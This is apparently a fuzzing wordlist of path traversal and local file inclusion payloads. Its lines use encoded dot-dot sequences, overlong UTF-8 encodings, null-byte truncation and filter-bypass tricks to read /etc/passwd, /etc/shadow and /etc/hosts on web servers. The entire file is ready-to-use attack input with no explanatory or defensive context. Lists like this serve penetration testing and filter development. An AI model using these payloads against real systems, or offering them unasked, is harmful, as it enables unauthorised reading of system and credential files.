file:///etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd%00.jpg
../../../../../../../../../../../../etc/passwd%00.html
/././././...//././././...//././././...//././././.../etc/passwd
../../../../../../../../../not_found
....//..../....//..../....//..../....//....//....//etc/passwd
..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
%00../../../../../../etc/passwd
%00../../../../../../etc/hosts
%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
..%c1%9c..%c1%9c/etc/passwd
..%c1%9c..%c1%9c..%c1%9c/etc/passwd
..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd